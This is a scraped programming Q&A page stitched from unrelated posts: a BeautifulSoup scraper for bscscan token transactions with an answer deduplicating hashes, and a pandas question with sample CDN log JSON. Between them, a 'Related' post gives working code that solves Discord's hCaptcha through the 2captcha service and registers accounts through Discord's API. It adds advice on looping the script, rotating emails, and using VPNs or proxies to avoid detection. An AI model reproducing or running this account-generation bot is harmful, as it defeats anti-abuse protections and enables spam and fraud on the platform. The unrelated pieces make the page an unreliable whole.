Formatting Python beautifulsoup data and remove duplicates first columns values - python

I have the following snippet that already works however, I wanted to clean up a bit in the formatting by removing some duplicates 1st column data and make it more readable.
from urllib.request import Request, urlopen
from bs4 import BeautifulSoup
import re, random, ctypes
import requests
from time import sleep
url = 'https://bscscan.com/tokentxns'
user_agent_list = [
"header = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0Gecko/20100101 Firefox/86.0'}",
"header = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36'}",
"header = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15'}",
"header = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36'}",
"header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36'}",
"header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36'}"
]
header = random.choice(user_agent_list)
pausesleep = float(random.randint(10000,30000)) / 10000 #orig
req = requests.get(url,header, timeout=10)
soup = BeautifulSoup(req.content, 'html.parser')
rows = soup.findAll('table')[0].findAll('tr')
for row in rows[1:]:
tds = row.find_all('td')
txnhash = tds[1].text[0:]
age = tds[2].text[0:]
value = tds[7].text[0:]
token = tds[8].text[0:]
link = urljoin(url, tds[8].find('a')['href'])
print (str(txnhash) + " " + str(value) + " " + str(token))
Current Output:
0x70e16e1cbcd30d1c3a2abb03a3d3c43fc324aa794c45b10cd5ef1001e9af0915 899.885819768 TrusterCoin (TSC)
0x70e16e1cbcd30d1c3a2abb03a3d3c43fc324aa794c45b10cd5ef1001e9af0915 0.62679168 Wrapped BNB (WBNB)
0x52d862d3f920370d84039f2dccb40edc7343699310d3436b71738d4176997398 388,214,984,514.909719227 WoofCoin (WOOF)
0x52d862d3f920370d84039f2dccb40edc7343699310d3436b71738d4176997398 0.003 Wrapped BNB (WBNB)
0x4fe83f2ebad772b4292e81f418a6f54572f7462934358a356787f8d777c58c8b 26.737674146727101117 Binance-Peg ... (BUSD)
0x4fe83f2ebad772b4292e81f418a6f54572f7462934358a356787f8d777c58c8b 1.251364193609566793 Binance-Peg ... (ADA)
0x4fe83f2ebad772b4292e81f418a6f54572f7462934358a356787f8d777c58c8b 0.03997685638568537 Binance-Peg ... (ADA)
0x4fe83f2ebad772b4292e81f418a6f54572f7462934358a356787f8d777c58c8b 0.041171860015645402 Binance-Peg ... (ADA)
0x4fe83f2ebad772b4292e81f418a6f54572f7462934358a356787f8d777c58c8b 0.089939749761843203 Wrapped BNB (WBNB)
Wanted Improvement:
0x70e16e1cbcd30d1c3a2abb03a3d3c43fc324aa794c45b10cd5ef1001e9af0915 899.885819768 TrusterCoin (TSC)
0.62679168 Wrapped BNB (WBNB)
0x52d862d3f920370d84039f2dccb40edc7343699310d3436b71738d4176997398 388,214,984,514.909719227 WoofCoin (WOOF)
0.003 Wrapped BNB (WBNB)
0x4fe83f2ebad772b4292e81f418a6f54572f7462934358a356787f8d777c58c8b 26.737674146727101117 Binance-Peg ... (BUSD)
1.251364193609566793 Binance-Peg ... (ADA)
0.03997685638568537 Binance-Peg ... (ADA)
0.041171860015645402 Binance-Peg ... (ADA)
0.089939749761843203 Wrapped BNB (WBNB)

Try this:
from urllib.request import Request, urlopen,urljoin
from bs4 import BeautifulSoup
import re, random, ctypes
import requests
from time import sleep
url = 'https://bscscan.com/tokentxns'
user_agent_list = [
"header = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:86.0Gecko/20100101 Firefox/86.0'}",
"header = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36'}",
"header = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15'}",
"header = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36'}",
"header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36'}",
"header = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36'}"
]
header = random.choice(user_agent_list)
pausesleep = float(random.randint(10000,30000)) / 10000
req = requests.get(url,header, timeout=10)
soup = BeautifulSoup(req.content, 'html.parser')
rows = soup.findAll('table')[0].findAll('tr')
ne=[]
for row in rows[1:]:
tds = row.find_all('td')
txnhash = tds[1].text[0:]
age = tds[2].text[0:]
value = tds[7].text[0:]
token = tds[8].text[0:]
link = urljoin(url, tds[8].find('a')['href'])
if str(txnhash) not in ne:
ne.append(str(txnhash))
print (str(txnhash),end=" ")
else:# If you want those tab also then. Otherwise remove else
print("\t\t\t",end=" ")
print(str(value) + " " + str(token))
We are creating list of txnhash in ne and then checking everytime if new txnhash is in that list or not.

Related

Receiving hcaptcha error from discord while using 2captcha (works - working code pasted below)

from twocaptcha import TwoCaptcha
import json
import requests
import random
def rand(list):
return random.randrange(0, len(list))
user_agents = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246',
'Mozilla/5.0 (X11; CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1'
]
headers = {
'user-agent': user_agents[rand(user_agents)],
"accept": "*/*",
"authority": "discord.com",
"method": "POST",
"path": "/api/v9/auth/register",
"scheme": "https",
"origin": "discord.com",
"referer": "discord.com/register",
"x-debug-options": "bugReporterEnabled",
"accept-language": "en-US,en;q=0.9",
"connection": "keep-alive",
"content-Type": "application/json",
"x-super-properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC45MDAzIiwib3NfdmVyc2lvbiI6IjEwLjAuMjIwMDAiLCJvc19hcmNoIjoieDY0Iiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiY2xpZW50X2J1aWxkX251bWJlciI6MTA0OTY3LCJjbGllbnRfZXZlbnRfc291cmNlIjpudWxsfQ==",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin"
}
solver = TwoCaptcha('redacted')
try:
result = solver.hcaptcha(
sitekey='4c672d35-0701-42b2-88c3-78380b0db560',
url='https://discord.com/register',
)
except Exception as e:
sys.exit(e)
else:
print(result['code'])
def getfingerprint():
request_url = "https://discord.com/api/v9/experiments?with_guild_experiments=true"
r = requests.get(request_url , headers = {
"user-agent": user_agents[rand(user_agents)],
"x-context-properties": "eyJsb2NhdGlvbiI6Ii9jaGFubmVscy9AbWUifQ==",
"x-super-properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzEwNS4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTA1LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjE0NTQyOSwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0="
})
if r.status_code == 200:
fingerprint = json.loads(r.text)["fingerprint"]
print(fingerprint)
else:
return r.text
payload = {
'captcha_key': result['code'],
'consent': True,
'date_of_birth': '2001-11-19',
'email': 'enter email',
'fingerprint': getfingerprint(),
'gift_code_sku_id': None,
'invite': None,
'password': 'enter username',
'username': 'enter password'
}
def register():
data = payload
res = requests.post('https://discord.com/api/v9/auth/register', headers = headers, json = data)
print('Token: ' + res.text)
if __name__ == '__main__':
register()
Code now works and generates accounts
just have to enter your own emails, username and password
can tell when it works cuz it outputs a token
if you get an error mentioning invalid hcaptcha response change email and use a vpn and try again
if you do decide to loop this have it loop slowly or setup proxies

Create batches of pandas dataframe based on timestamp

I have a dataframe of the following form:
#timestamp ISP cache_result client_ip client_request_host client_request_method client_ua client_url client_user content_type ... http_response_code major os os_name querystring reply_length_bytes ts_process_time ts_timestamp type ua_name
2018-04-17T08:12:32.000Z cuaerH c rt,nlEIrnii.cec TCP_REFRESH_MISS 25.204.184.124 testhost.net GET Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl... /wp-content/themes/Avada/includes/lib/assets/m... - application/javascript ... 200 65.0 Windows 10 Windows 10 ?ver=2.2.3 25204 321 17/Apr/2018:08:12:32 -0000 testdata Chrome
2018-04-17T08:12:32.000Z HeE iclirueIc rat,nrncc. TCP_REFRESH_MISS 8.157.89.174 testhost.net GET Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl... /wp-content/plugins/fusion-core/js/min/avada-p... - application/javascript ... 200 65.0 Windows 10 Windows 10 ?ver=1 2825 177 17/Apr/2018:08:12:32 -0000 testdata Chrome
2018-04-17T08:12:33.000Z ,rrnI EnH.ceeiuclcicrat TCP_REFRESH_MISS 37.151.22.36 testhost.net GET Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl... /wp-content/themes/Avada/includes/lib/assets/m... - application/javascript ... 200 65.0 Windows 10 Windows 10 ?ver=1 267 275 17/Apr/2018:08:12:33 -0000 testdata Chrome
2018-04-17T08:12:34.000Z tn.cHer uE,lecnir aircIc TCP_REFRESH_MISS 202.165.110.43 testhost.net GET Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl... /wp-content/themes/Avada/includes/lib/assets/m... - application/javascript ... 200 65.0 Windows 10 Windows 10 ?ver=1 341 172 17/Apr/2018:08:12:34 -0000 testdata Chrome
2018-04-17T08:12:34.000Z rneecHuraci ctInir cl.,E TCP_REFRESH_MISS 174.201.44.32 testhost.net GET Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl... /wp-content/plugins/fusion-builder/assets/js/m... - application/javascript ... 200 65.0 Windows 10 Windows 10 ?ver=1 302 180 17/Apr/2018:08:12:34 -0000 testdata Chrome
Is it possible to somehow split it to 2 minutes intervals? Let's say a function that takes the whole dataframe and outputs a df with the rows of the first 2 minutes, then if called again, it outputs the df with the rows of the next 2 minutes and so on.
EDIT: A larger portion of my data is the following:
{"#timestamp":"2018-04-17T08:12:32.000Z","ISP":"cuaerH c rt,nlEIrnii.cec","cache_result":"TCP_REFRESH_MISS","client_ip":"25.204.184.124","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/includes\/lib\/assets\/min\/js\/library\/jquery.ilightbox.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"ecftdl1e","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=2.2.3","reply_length_bytes":25204,"ts_process_time":321,"ts_timestamp":"17\/Apr\/2018:08:12:32 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:32.000Z","ISP":"HeE iclirueIc rat,nrncc.","cache_result":"TCP_REFRESH_MISS","client_ip":"8.157.89.174","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/plugins\/fusion-core\/js\/min\/avada-portfolio.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"ced1tlef","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=1","reply_length_bytes":2825,"ts_process_time":177,"ts_timestamp":"17\/Apr\/2018:08:12:32 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:33.000Z","ISP":" ,rrnI EnH.ceeiuclcicrat","cache_result":"TCP_REFRESH_MISS","client_ip":"37.151.22.36","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/includes\/lib\/assets\/min\/js\/general\/fusion-waypoints.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"lde1ftce","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=1","reply_length_bytes":267,"ts_process_time":275,"ts_timestamp":"17\/Apr\/2018:08:12:33 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:34.000Z","ISP":"tn.cHer uE,lecnir aircIc","cache_result":"TCP_REFRESH_MISS","client_ip":"202.165.110.43","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/includes\/lib\/assets\/min\/js\/library\/jquery.requestAnimationFrame.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"cl1etefd","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=1","reply_length_bytes":341,"ts_process_time":172,"ts_timestamp":"17\/Apr\/2018:08:12:34 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:34.000Z","ISP":"rneecHuraci ctInir cl.,E","cache_result":"TCP_REFRESH_MISS","client_ip":"174.201.44.32","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/plugins\/fusion-builder\/assets\/js\/min\/general\/fusion-countdown.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"ctl1fdee","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=1","reply_length_bytes":302,"ts_process_time":180,"ts_timestamp":"17\/Apr\/2018:08:12:34 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:35.000Z","ISP":"ri enuaHccecrcnl,.tir EI","cache_result":"TCP_REFRESH_MISS","client_ip":"170.122.151.169","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/plugins\/fusion-builder\/assets\/js\/min\/general\/fusion-flip-boxes.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"cl1feted","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=1","reply_length_bytes":376,"ts_process_time":178,"ts_timestamp":"17\/Apr\/2018:08:12:35 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:36.000Z","ISP":"earr ec,ulIriccnH.ci ntE","cache_result":"TCP_REFRESH_MISS","client_ip":"177.120.159.58","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/includes\/lib\/assets\/min\/js\/library\/jquery.appear.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"t1lceedf","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=1","reply_length_bytes":1331,"ts_process_time":179,"ts_timestamp":"17\/Apr\/2018:08:12:36 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:36.000Z","ISP":"a, uEr.cnIlHeictrecrcni ","cache_result":"TCP_REFRESH_MISS","client_ip":"94.247.12.106","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/plugins\/fusion-builder\/assets\/js\/min\/general\/fusion-tabs.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"fetel1dc","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=1","reply_length_bytes":1154,"ts_process_time":86,"ts_timestamp":"17\/Apr\/2018:08:12:36 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:37.000Z","ISP":"rlcEt.icree ncaI uHi,crn","cache_result":"TCP_REFRESH_MISS","client_ip":"149.218.159.35","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/includes\/lib\/assets\/min\/js\/library\/jquery.hoverintent.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"lecte1df","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=1","reply_length_bytes":463,"ts_process_time":172,"ts_timestamp":"17\/Apr\/2018:08:12:37 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:38.000Z","ISP":"e,ir ctuE iccnanrceIHlr.","cache_result":"TCP_REFRESH_MISS","client_ip":"138.228.110.199","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/includes\/lib\/assets\/min\/js\/library\/jquery.cycle.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"e1ftlecd","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=3.0.3","reply_length_bytes":7523,"ts_process_time":179,"ts_timestamp":"17\/Apr\/2018:08:12:38 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:39.000Z","ISP":"nirEei,latnu.cr cIH recc","cache_result":"TCP_REFRESH_MISS","client_ip":"117.81.45.92","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/includes\/lib\/assets\/min\/js\/library\/jquery.placeholder.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"cte1efdl","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=2.0.7","reply_length_bytes":874,"ts_process_time":178,"ts_timestamp":"17\/Apr\/2018:08:12:39 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:39.000Z","ISP":"Eic,e rlHccacrnuntI .rie","cache_result":"TCP_REFRESH_MISS","client_ip":"62.189.164.148","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/includes\/lib\/assets\/min\/js\/general\/fusion-tooltip.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"fe1eltdc","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=1","reply_length_bytes":452,"ts_process_time":89,"ts_timestamp":"17\/Apr\/2018:08:12:39 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:40.000Z","ISP":"It.crue,lare rHiic cncnE","cache_result":"TCP_REFRESH_MISS","client_ip":"136.44.153.177","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/includes\/lib\/assets\/min\/js\/general\/fusion-ie1011.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"1dcetlef","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=1","reply_length_bytes":526,"ts_process_time":89,"ts_timestamp":"17\/Apr\/2018:08:12:40 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:41.000Z","ISP":"nIr,erecluiiHac cr.Ec nt","cache_result":"TCP_REFRESH_MISS","client_ip":"228.104.233.205","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/assets\/min\/js\/library\/bootstrap.scrollspy.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"ec1edltf","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=3.3.2","reply_length_bytes":1060,"ts_process_time":172,"ts_timestamp":"17\/Apr\/2018:08:12:41 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:42.000Z","ISP":"lrne,tEcuc eircIHc.air n","cache_result":"TCP_REFRESH_MISS","client_ip":"168.41.158.162","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/assets\/min\/js\/library\/jquery.sticky-kit.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"d1efctle","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=5.4.2","reply_length_bytes":1208,"ts_process_time":185,"ts_timestamp":"17\/Apr\/2018:08:12:42 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:27.000Z","ISP":".cccti a neuleEc,rriHnrI","cache_result":"TCP_REFRESH_MISS","client_ip":"113.202.240.119","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/plugins\/revslider\/public\/assets\/js\/jquery.themepunch.tools.min.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"d1eflcet","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=5.4.7","reply_length_bytes":38335,"ts_process_time":313,"ts_timestamp":"17\/Apr\/2018:08:12:27 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:28.000Z","ISP":"lnniueeiIH.ca rtrc ,ccEr","cache_result":"TCP_REFRESH_HIT","client_ip":"190.220.94.243","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/uploads\/2017\/10\/viettan.png","client_user":"-","content_type":"image\/png","device":"Other","dnet":"delcfet1","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":null,"reply_length_bytes":1549,"ts_process_time":170,"ts_timestamp":"17\/Apr\/2018:08:12:28 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:29.000Z","ISP":"ein.rcaelc uEn tIHcrcr,i","cache_result":"TCP_REFRESH_HIT","client_ip":"31.13.51.177","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/uploads\/2018\/03\/facebookviettan.jpg","client_user":"-","content_type":"image\/jpeg","device":"Other","dnet":"edteclf1","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":null,"reply_length_bytes":6705,"ts_process_time":178,"ts_timestamp":"17\/Apr\/2018:08:12:29 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:31.000Z","ISP":"clr,Hncie uaIciEncr. ter","cache_result":"TCP_REFRESH_HIT","client_ip":"128.129.21.211","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/uploads\/2018\/03\/chantroimoimedia.jpg","client_user":"-","content_type":"image\/jpeg","device":"Other","dnet":"edce1tlf","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":null,"reply_length_bytes":6216,"ts_process_time":90,"ts_timestamp":"17\/Apr\/2018:08:12:31 -0000","type":"testdata","ua_name":"Chrome"}
{"#timestamp":"2018-04-17T08:12:43.000Z","ISP":"tnrI.ccenruiirlE He,c ca","cache_result":"TCP_REFRESH_MISS","client_ip":"225.14.12.26","client_request_host":"testhost.net","client_request_method":"GET","client_ua":"Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/65.0.3325.181 Safari\/537.36","client_url":"\/wp-content\/themes\/Avada\/assets\/min\/js\/general\/avada-contact-form-7.js","client_user":"-","content_type":"application\/javascript","device":"Other","dnet":"ec1tfled","host":"testhost.deflect.ca","http_request_scheme":"http","http_request_version":"HTTP\/1.1","http_response_code":200,"major":65.0,"os":"Windows 10","os_name":"Windows 10","querystring":"?ver=5.4.2","reply_length_bytes":504,"ts_process_time":178,"ts_timestamp":"17\/Apr\/2018:08:12:43 -0000","type":"testdata","ua_name":"Chrome"}
